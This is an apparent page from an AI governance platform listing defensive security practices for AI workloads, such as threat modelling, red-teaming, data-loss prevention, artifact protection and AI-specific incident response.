Rulix AI — AI Governance Assessment Platform

Adopted from Microsoft CAF's Secure AI process. AI workloads create new attack surfaces traditional security cannot fully cover.

Threat-model AI workloads. Start from the existing framework (STRIDE), supplement with MITRE ATLAS and OWASP Generative AI risk inventories. Validate that the existing enterprise framework actually addresses prompt injection, model inversion, data poisoning, jailbreak — don't assume.
AI-data risk assessment. Identify where sensitive data flows into agent prompts, RAG retrieval, and training/fine-tuning data.
Adversarial testing / red-teaming. Before production, after major model updates, and on a periodic cadence. Both generative and non-generative models. Documented results.
Recurring assessments. New threats emerge; the threat landscape isn't static.

Complete AI asset inventory — internally built and vendor-embedded (§15).
Secure all agent communication channels. Managed identities (no stored secrets). Private network paths where possible. Secured MCP server endpoints.
Data boundaries. Classification labels enforced; RBAC by workload and user group; private endpoints for sensitive storage.
Data-loss prevention. Scan and block sensitive data in agent inputs and outputs. Custom detectors for org-specific patterns.
Protect AI artifacts. Models, fine-tuned weights, eval datasets, prompts. Encrypt at rest and in transit. Strict access policies. Monitor for unauthorized access.

Automated AI risk detection. Real-time visibility into anomalous agent behavior; integrated with SOC tooling.
AI-focused incident response procedures. AI-specific runbooks for prompt-injection incidents, jailbreaks, data-exfiltration attempts, model compromise. Tested.
Clear escalation paths for different AI incident types.
Disaster recovery — multi-region for High-availability agents, tested quarterly, automated backups of trained/fine-tuned artifacts.